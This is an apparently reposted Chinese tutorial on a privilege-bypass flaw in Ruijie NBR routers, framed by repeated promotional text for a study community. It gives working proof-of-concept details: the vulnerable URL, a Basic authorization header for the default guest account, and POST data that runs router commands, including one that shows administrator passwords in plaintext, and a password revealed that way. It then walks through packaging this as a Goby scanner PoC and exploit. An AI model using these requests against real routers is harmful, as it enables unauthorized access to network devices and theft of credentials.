网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
漏洞名称:锐捷NBR路由器COOKIE欺骗权限绕过
详情:锐捷设备保留两个账户manager和guest,并且这两个账户都不能删除,默认密码同账户名。如下图只要修改完cookie在重新刷新一下即可登录到admin管理界面。
用guest账户登录完是这样子的,左侧菜单栏都木有的!
修改完cookie刷新之后是这样子的,左侧菜单栏都出现了:
在登录处进行抓包,可以看到登陆的时候发送的post请求,基于http basic认证,并且发送command命令show clock:
如果是没有认证,执行这个命令是不会有结果的,如下图:
2.2 POC关键参数
漏洞URL
/WEB_VMS/LEVEL15/
Header部分
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Data部分
command=show clock&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
还有一些可以执行的命令:
查看配置
show run
查看LAN和WAN口
show sys-mod
查看用户等等
show webmaster users
2.3 POC编写
首先,路由器的goby规则是app=“Ruijie-NBR-Router”,完成这两个必填项即可。
下一步,测试部分的四个必填项。漏洞简介里面咱们已经知道了这四项参数,逐一添加进去。
剩下就是响应测试部分的填写了,一个判断存在漏洞的部分,在漏洞简介里面截图,可以看到响应的部分,找一个比较唯一的准确的关键参数作为存在漏洞的标识,然后保存。
POC部分就写好了!其实EXP部分也就完成80%了。
2.4 EXP编写
首先,找到刚才编写的POC自动生成的JSON文件。
路径:\goby-win-x64-1.8.202\golib\exploits\user
打开json文件?没错,因为UI里没有地方写,咱们只能在json里写了!
在Scanstep上面添加语句:
其实这部分,要是细心的小伙伴就能发现Goby和FOFA写EXP是一个样子的。
所以接下来,和FOFA一样有个ExploitSteps部分,但是goby相对于FOFA来说好写的很多,只需要将Scanstep部分复制下来即可,这就是说为什么写完PoC部分相当于完成EXP的80%了,然后添加output|lastbody把响应的body展示出来,OK了。
看一下结果,show webmaster users看的是账号的明文密码,ruijie@2017
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
可以添加戳这里获取](https://bbs.youkuaiyun.com/topics/618658159)**
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!